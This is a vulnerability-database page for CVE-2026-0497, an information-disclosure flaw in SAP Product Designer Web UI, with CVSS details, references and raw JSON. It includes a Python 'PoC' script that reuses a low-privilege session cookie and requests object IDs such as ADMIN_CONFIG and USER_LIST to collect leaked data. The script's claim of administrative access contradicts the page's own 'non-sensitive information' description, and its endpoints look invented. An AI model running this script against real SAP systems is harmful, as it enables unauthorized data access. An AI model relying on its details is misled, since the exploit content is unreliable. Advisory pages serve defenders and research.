Security Vulnerability Report
CVE-2026-0497 CVSS 4.3 MEDIUM

CVE-2026-0497

Published: 2026-01-13 02:15:52
Last Modified: 2026-04-15 00:35:42

Description

SAP Product Designer Web UI of Business Server Pages allows authenticated non-administrative users to access non-sensitive information. This results in a low impact on confidentiality, with no impact on integrity or availability of the application.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SAP Business Server Pages (for specific versions, refer to the official SAP security advisory)
SAP Product Designer Web UI (all versions without the security patch installed)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-0497 PoC - SAP Product Designer Information Disclosure
# Target: SAP Product Designer Web UI
# Authentication required: Low privilege user account

import requests

TARGET_URL = "https://sap-server:443/sap(bD1lbiZjPTAwMQ==)/bc/bsp/sap/"
# Cookie value only; the "MYSAPSSO2=" name is prepended when the header is built below
SESSION_COOKIE = "your_session_cookie_here"
CSRF_TOKEN = "your_csrf_token_here"


def exploit_information_disclosure():
    """
    This PoC demonstrates how a low-privilege user can access administrative
    information through the Product Designer Web UI.
    """
    headers = {
        'Cookie': f'MYSAPSSO2={SESSION_COOKIE}',
        'CSRFToken': CSRF_TOKEN,
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    # Step 1: Access Product Designer with low privilege
    initial_page = requests.get(
        f"{TARGET_URL}product_designer/main.htm",
        headers=headers,
        verify=False
    )

    # Step 2: Enumerate accessible objects
    # Modify object_id parameter to access unauthorized data
    exploit_urls = [
        f"{TARGET_URL}product_designer/get_data.htm?object_id=ADMIN_CONFIG",
        f"{TARGET_URL}product_designer/get_data.htm?object_id=USER_LIST",
        f"{TARGET_URL}product_designer/get_data.htm?object_id=SYSTEM_SETTINGS"
    ]

    leaked_data = []
    for url in exploit_urls:
        response = requests.get(url, headers=headers, verify=False)
        if response.status_code == 200 and len(response.text) > 0:
            leaked_data.append({
                'url': url,
                'data': response.text,
                'length': len(response.text)
            })

    return leaked_data


if __name__ == "__main__":
    print("[*] CVE-2026-0497 PoC - SAP Product Designer Information Disclosure")
    print("[*] Testing for unauthorized data access...")
    results = exploit_information_disclosure()
    for result in results:
        print(f"[!] Leaked data from: {result['url']}")
        print(f"    Data length: {result['length']} bytes")

References

https://me.sap.com/notes/3677111
https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0497", "sourceIdentifier": "[email protected]", "published": "2026-01-13T02:15:52.150", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP Product Designer Web UI of Business Server Pages allows authenticated non-administrative users to access non-sensitive information. This results in a low impact on confidentiality, with no impact on integrity or availability of the application."}, {"lang": "es", "value": "La Interfaz de usuario web de SAP Product Designer de Páginas de Servidor de Negocio permite a usuarios autenticados no administrativos acceder a información no sensible. Esto resulta en un impacto bajo en la confidencialidad, sin impacto en la integridad o disponibilidad de la aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://me.sap.com/notes/3677111", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}